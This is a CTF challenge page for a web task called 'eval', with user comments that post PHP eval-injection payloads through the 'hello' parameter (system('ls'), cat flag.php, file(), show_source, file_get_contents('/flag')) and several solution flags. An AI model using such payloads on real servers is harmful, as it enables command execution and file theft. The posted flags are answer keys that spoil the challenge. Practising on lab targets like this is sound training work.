evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 18145
提  示:
描  述:
eval
评论
zhuleixy 1年前

我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//

回复 3

15738762315 1年前

flag{6dd6075616f5943ab53cff237ff1a63b}

回复 0

maoctf 1年前

flag{b97285ef92aa650fa9223aafc7adc646};

回复 0

哥哥 1年前

http://114.67.175.224:12290//?hello=file('flag.php')

回复 0

z03ctfer 1年前

?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中

回复 0

马踏黄河两岸 2年前

../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php

回复 0

lilifanqian 2年前

flag{4cadd25b49840f0cdb999cdabc86b103}

回复 0

18843672580 2年前

flag{21ebfdf5494104f4f54eca2bdd3cb902}

回复 0

鸡你太美 2年前

http://114.67.175.224:14089//?hello=file('flag.php') flag{1c587b72b36adc6efad7f93dce06182f}

回复 3

啵咯啵咯 2年前

/?hello=show_source("./flag.php")

回复 1

WriteUp

image
harry

1 金币

评分(10)

解题动态

18996315220 攻破了该题 48分钟前
BLX123 攻破了该题 8小时前
xjn12 攻破了该题 12小时前
SDLbyZ 攻破了该题 12小时前
771232546 攻破了该题 14小时前
19941759966 攻破了该题 15小时前
lancertyk 攻破了该题 1天前
zdabajfk 攻破了该题 1天前
---snow--- 攻破了该题 1天前
1293273679 攻破了该题 1天前
homniloquy 攻破了该题 1天前
violet06 攻破了该题 1天前
Oliver23 攻破了该题 2天前
wwwwzh123 攻破了该题 2天前
sdxsdxl 攻破了该题 2天前
yaoyao0 攻破了该题 2天前
白露早 攻破了该题 2天前
liberator 攻破了该题 2天前
nidexun 攻破了该题 2天前
干饭人干饭魂 攻破了该题 2天前
问题反馈